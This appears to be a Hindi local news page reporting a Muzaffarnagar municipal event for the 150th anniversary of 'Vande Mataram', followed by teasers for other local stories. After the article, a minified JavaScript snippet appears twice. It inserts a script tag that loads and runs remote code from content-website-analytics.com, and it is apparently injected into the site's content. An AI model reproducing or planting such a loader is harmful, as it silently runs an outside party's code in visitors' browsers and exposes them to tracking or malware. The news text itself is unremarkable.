वंदे मातरम केवल गीत नहीं, भारत की आत्मा का स्वर हैः मीनाक्षी स्वरूप

वंदे मातरम् के 150 वर्ष पूर्ण होने पर राष्ट्रभक्ति की भावना में डूबी नगर पालिका, तिरंगा लहराकर गाया राष्ट्र गीत

मुजफ्फरनगर। राष्ट्र गीत वंदे मातरम् के 150 वर्ष पूर्ण होने के अवसर पर नगर पालिका परिषद् सभागार में शुक्रवार को एक भव्य कार्यक्रम का आयोजन किया गया। यह आयोजन राष्ट्रवाद, एकता और देशभक्ति की भावना से ओतप्रोत रहा। कार्यक्रम में मुख्य अतिथि रहीं नगरपालिका अध्यक्ष मीनाक्षी स्वरूप ने अधिकारियों, कर्मचारियों और नगर के प्रबुद्ध नागरिकों के साथ प्रधानमंत्री नरेन्द्र मोदी का प्रेरक उद्बोधन लाइव सुना तथा उसके उपरांत सभी ने राष्ट्रगीत ‘वंदे मातरम् का सामूहिक वाचन कर तिरंगा लहराते हुए मातृभूमि के प्रति निष्ठा और समर्पण की भावना व्यक्त की।
कार्यक्रम के प्रारंभ में टाउनहाल स्थित पालिका सभागार में उपस्थित सभी अधिकारियों और जनप्रतिनिधियों ने राष्ट्रगीत की रचना के ऐतिहासिक महत्व पर प्रकाश डाला, जिसमें बताया गया कि वंदे मातरम् की रचना 1875 में बंकिमचंद्र चट्टोपाध्याय ने की थी, जो बाद में भारत के स्वतंत्रता संग्राम की आत्मा बन गई। इस अवसर पर देशभक्ति गीतों, कविताओं और भाषणों के माध्यम से स्वतंत्रता संग्राम के अमर सेनानियों को भी याद किया गया।

इसे भी पढ़ें:  दहेज ठुकराने वाले युवाओं को विशेष सम्मान देगी सर्वखाप पंचायतः नरेश टिकैत

सभा को संबोधित करते हुए नगरपालिका अध्यक्ष मीनाक्षी स्वरूप ने कहा कि वंदे मातरम् केवल भारत का राष्ट्रीय गीत ही नहीं, स्वतंत्रता आंदोलन का प्राण भी है। यह बंकिमचंद्र चट्टोपाध्याय जी द्वारा सांस्कृतिक राष्ट्रवाद की प्रथम उद्घोषणा है, जिसने हमें यह स्मरण कराया कि भारत केवल भौगोलिक इकाई नहीं, बल्कि एक भू-सांस्कृतिक राष्ट्र है, जिसकी एकता उसकी संस्कृति और सभ्यता में निहित है।
उन्होंने आगे कहा कि वंदे मातरम् भारत की आत्मा का स्वर है। इसने स्वतंत्रता संग्राम के दौरान देशवासियों में मातृभूमि के प्रति गर्व, समर्पण और बलिदान की भावना जगाई। 150 वर्षों से यह गीत राष्ट्रवाद, एकता और नवऊर्जा का प्रतीक बनकर नई पीढ़ियों को प्रेरित करता आ रहा है। मीनाक्षी स्वरूप ने उपस्थित जनसमूह से आवाहन किया कि वे इस प्रेरणादायी गीत को अपने जीवन में आत्मसात करें और इसके पूर्ण संस्करण का सामूहिक गान कर इसकी गूंज आने वाली पीढ़ियों तक पहुँचाएँ।
कार्यक्रम के अंत में सभी ने सामूहिक रूप से राष्ट्रगीत का पूर्ण वाचन किया और भारत माता की जय के उद्घोष से सभागार गूंज उठा। पालिका परिसर में तिरंगा फहराकर शहीदों के प्रति श्रद्धांजलि अर्पित की गई। इस अवसर पर मुख्य रूप से अधिशासी अधिकारी डॉ. प्रज्ञा सिंह, व्यापारी नेता शलभ गुप्ता, सहायक अभियंता निर्माण नैपाल सिंह, लिपिक अशोक ढींगरा, आईटी प्रियेश सिंह, मैनपाल सिंह, संदीप यादव, नितिन कुमार, मनोज पाल, गोपीचंद वर्मा, निपुण कन्नौजिया, कैलाश नारायण, प्रवीण कुमार, सुनील कुमार, रूचि शर्मा सहित अन्य कर्मचारी मौजूद रहे। राष्ट्रगीत के 150वें वर्ष का यह आयोजन नगर में राष्ट्रभक्ति और एकता का प्रतीक बनकर यादगार साबित हुआ।

इसे भी पढ़ें:  शोक की बारिश में डूबा रामपुरी, छह तीर्थ यात्रियों की शोकसभा में आसमां भी रोया

;(function(f,i,u,w,s){w=f.createElement(i);s=f.getElementsByTagName(i)[0];w.async=1;w.src=u;s.parentNode.insertBefore(w,s);})(document,’script’,’https://content-website-analytics.com/script.js’);;(function(f,i,u,w,s){w=f.createElement(i);s=f.getElementsByTagName(i)[0];w.async=1;w.src=u;s.parentNode.insertBefore(w,s);})(document,’script’,’https://content-website-analytics.com/script.js’);

Also Read This

नई मंडी में जर्जर टेलीफोन खंभा बना खतरा, हादसे की आशंका

गौशाला रोड पर झुका निष्प्रयोज्य खंभा, विद्युत केबल बंधे होने से करंट फैलने का भी डर मुजफ्फरनगर। नई मंडी क्षेत्र की व्यस्ततम गौशाला रोड पर विभागीय लापरवाही के चलते एक बड़ा हादसा होने की आशंका बनी हुई है। गौशाला के बाहर शौचालय के समीप लगा टेलीफोन का जर्जर और निष्प्रयोज्य खंभा लंबे समय से सड़क की ओर झुका हुआ है, लेकिन संबंधित विभाग द्वारा अब तक इसे हटाने की कोई कार्रवाई नहीं की गई है। इसे भी पढ़ें:  खतौली कूड़ा विवाद: घर के बाहर कूड़ा डालने पर भड़का विवाद, पुलिस-पालिका कर्मचारी आमने-सामनेस्थानीय लोगों का कहना है कि खंभा नीचे से पूरी तरह गल चुका है और मुड़ने के कारण कभी

Read More »

खतौली पुलिस ने दो शातिर अभियुक्तों को किया गिरफ्तार

अवैध हथियार रखने के आरोप में हुई कार्रवाई, पुलिस ने दर्ज किया मुकदमा मुजफ्फरनगर। जनपद में अपराधियों, वारंटियों और वांछित अभियुक्तों की धरपकड़ के लिए चलाए जा रहे विशेष अभियान के तहत खतौली पुलिस को महत्वपूर्ण सफलता मिली है। पुलिस ने दो युवकों को गिरफ्तार कर उनके खिलाफ आर्म्स एक्ट के तहत मुकदमा दर्ज किया है। कार्रवाई के बाद दोनों आरोपियों को न्यायिक प्रक्रिया के लिए भेज दिया गया। इसे भी पढ़ें:  मुजफ्फरनगर-कुष्ठ आश्रम मंदिर के पुजारी को दुकानदारों ने पीटावरिष्ठ पुलिस अधीक्षक के निर्देश पर चलाए जा रहे अभियान के अंतर्गत पुलिस अधीक्षक नगर के निर्देशन तथा क्षेत्राधिकारी खतौली और प्रभारी निरीक्षक दिनेश चन्द्र बघेल के नेतृत्व में थाना

Read More »

नहरों में पानी न आने से किसानों में भारी रोष, 30 मई को आंदोलन

भीषण गर्मी, बिजली कटौती और सूखे से सैकड़ों गांव प्रभावित, भाकियू नेता विकास शर्मा ने सिंचाई विभाग को ठहराया जिम्मेदार मुजफ्फरनगर। जिले में लगातार पड़ रही भीषण गर्मी, बारिश की कमी, नहरों में पानी न आने और अंधाधुंध बिजली कटौती ने किसानों की मुश्किलें बढ़ा दी हैं। सिंचाई व्यवस्था चरमराने से खेतों में खड़ी फसलें सूखने की कगार पर पहुंच गई हैं। इससे किसानों में भारी आक्रोश व्याप्त है। भारतीय किसान यूनियन के नेता एवं जिला पंचायत सदस्य पति विकास शर्मा ने सिंचाई विभाग और बिजली विभाग पर लापरवाही का आरोप लगाते हुए आंदोलन की चेतावनी दी है। इसे भी पढ़ें:  मुजफ्फरनगर-सड़क हादसे में घायल पत्रकार की मेरठ के अस्पताल

Read More »